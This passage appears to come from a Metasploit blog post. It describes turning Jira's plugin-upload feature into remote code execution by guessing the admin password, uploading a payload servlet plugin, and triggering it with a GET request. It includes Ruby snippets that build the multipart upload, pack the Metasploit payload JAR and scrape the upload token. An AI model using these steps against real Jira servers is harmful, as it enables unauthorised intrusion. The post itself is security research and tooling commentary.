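# "plugin", matching multipartHandler.getFilePart(request, "plugin").
boundary  = '----PluginUploadBoundary1337'       # arbitrary placeholder
jar_bytes = "PK\x03\x04fake-jar-contents"        # stand-in for a real plugin JAR

body = []
body << "--#{boundary}\r\n"
body << "Content-Disposition: form-data; name=\"plugin\"; filename=\"evil.jar\"\r\n"
body << "Content-Type: application/octet-stream\r\n\r\n"
body << jar_bytes
body << "\r\n--#{boundary}--\r\n"
body = body.join

# The boundary must also be advertised in the request's Content-Type header.
content_type = "multipart/form-data; boundary=#{boundary}"
puts content_type
```

In a real module the HttpClient mixin handles most of this framing for you; the sketch just shows what FileUploadBase.parseRequest ends up consuming on the server side.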
The process for properly building an Atlassian plugin for a servlet is documented here. First, create an atlassian-plugin.xml similar to the following:
<atlassian-plugin name="Hello World Servlet" key="example.plugin.helloworld" plugins-version="2">
  <plugin-info>
    <description>A basic Servlet module test - says "Hello World!"</description>
    <vendor name="Atlassian Software Systems" url="http://www.atlassian.com"/>
    <version>1.0</version>
  </plugin-info>
  <servlet name="Hello World Servlet" key="helloWorld" class="com.example.myplugins.helloworld.HelloWorldServlet">
    <description>Says Hello World, Australia or your name.</description>
    <url-pattern>/helloworld</url-pattern>
    <init-param>
      <param-name>defaultName</param-name>
      <param-value>Australia</param-value>
    </init-param>
  </servlet>
</atlassian-plugin>
Your servlet will be accessible within the Atlassian web application via each url-pattern you specify, beneath the /plugins/servlet parent path. For example, if you specify a url-pattern of /helloworld as above, and your Atlassian application was deployed at localhost/jira, then your servlet would be accessible at localhost/jira/plugins/servlet/helloworld. Simply send a GET request to this path to execute the malicious servlet.
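The path construction just described is simple enough to sketch: the final servlet URL is the application's base URL, the fixed /plugins/servlet prefix, and the url-pattern from the plugin descriptor (the base URL here is the placeholder deployment from the example above):

```ruby
# Hypothetical base URL and the url-pattern from atlassian-plugin.xml.
base_url    = 'http://localhost/jira'  # placeholder deployment path
url_pattern = '/helloworld'

# Servlet modules are always mounted beneath /plugins/servlet.
servlet_url = "#{base_url}/plugins/servlet#{url_pattern}"
puts servlet_url  # → http://localhost/jira/plugins/servlet/helloworld
```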
As is standard for authenticated users in almost any popular content management system (see: WordPress), uploading is a feature for the UPM component, not an unintentional attack vector. However, since Jira does not enforce a password policy by default and relies on an easily guessed password for the admin user out of the box, we are able to exploit this functionality to achieve remote code execution. Metasploit particularly appreciates foreverday vulnerabilities like this one for their ability to even temporarily redefine the accepted and measured definition of “risk.” RCE plus a large user base makes a potent combination; since our team knows this exploit is used in the wild on engagements, the decision to analyze and incorporate it into Metasploit Framework was a simple one.
To build a Metasploit module for this, the HttpClient mixin should be more than enough to accomplish most tasks, including logging in, obtaining a token, uploading, and executing the servlet. To build the plugin (add-on), you’ll need to use the following packaging, as the module author demonstrates:
zip = payload.encoded_jar
zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
zip.add_file('/metasploit/PayloadServlet.class', servlet)
contents = zip.pack
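The token mentioned earlier also has to be scraped after login. As a rough sketch, assuming the token is embedded in the response HTML as a meta tag (the sample body and attribute layout here are illustrative, not taken from the module):

```ruby
# Illustrative response body; a real module would parse the actual
# post-login response. The attribute layout is an assumption.
html = '<meta id="upm-token" name="upm-token" content="1234567890abcdef">'

# Pull the token value out with a simple regex against the content attribute.
token = html[/upm-token"\s+content="([^"]+)"/, 1]
puts token  # → 1234567890abcdef
```

With the session cookie, the token, and the packed plugin zip in hand, the module has everything the installFromFileSystem endpoint validates before installing the payload.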
As a former Metasploit researcher once said, a software vulnerability at its core can be thought of as an undocumented, unintentional application program interface—unless, that is, the application-program-interfacing is entirely intentional and wears the hat of a feature. In the course of our everyday research and content analysis, the Metasploit Framework team encounters the full spectrum of RCE-bedecked functionality: bugs that are recognized as obvious accidents and efficiently fitted with CVEs; features that don’t know their own strength and are dressed down with modified configuration recommendations; and foreverday vulnerabilities laid bare by a combination of vendor choice and human failure.
As ever, we are grateful to our community of contributors and users for their creativity, their persistence, and their dedication to demonstrating both expected and unconventional risk.
Rapid7 has a robust disclosure policy and a team that actively works with external researchers and vendors on coordinated disclosure. Occasionally, Metasploit’s research team is tapped to develop PoC exploits or module-ize an existing PoC that demonstrates risk and impact to third parties. If you’re a Metasploit contributor with an undisclosed vulnerability you’d like to submit as a pull request, we salute you—but please allow us to help you coordinate disclosure with the vendor first: cve@rapid7.com (PGP public key 959D3EDA, for those who are so inclined).
Metasploit is a collaboration between Rapid7 and the open source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. To download Metasploit, visit metasploit.com.
Rapid7 (Nasdaq: RPD) is advancing security with visibility, analytics, and automation delivered through our Insight cloud. Our solutions simplify the complex, allowing security teams to work more effectively with IT and development to reduce vulnerabilities, monitor for malicious behavior, investigate and shut down attacks, and automate routine tasks. Over 7,200 customers rely on Rapid7 technology, services, and research to improve security outcomes and securely advance their organizations. For more information about Rapid7 or to join our threat research, visit our website, check out our blog, or follow us on Twitter.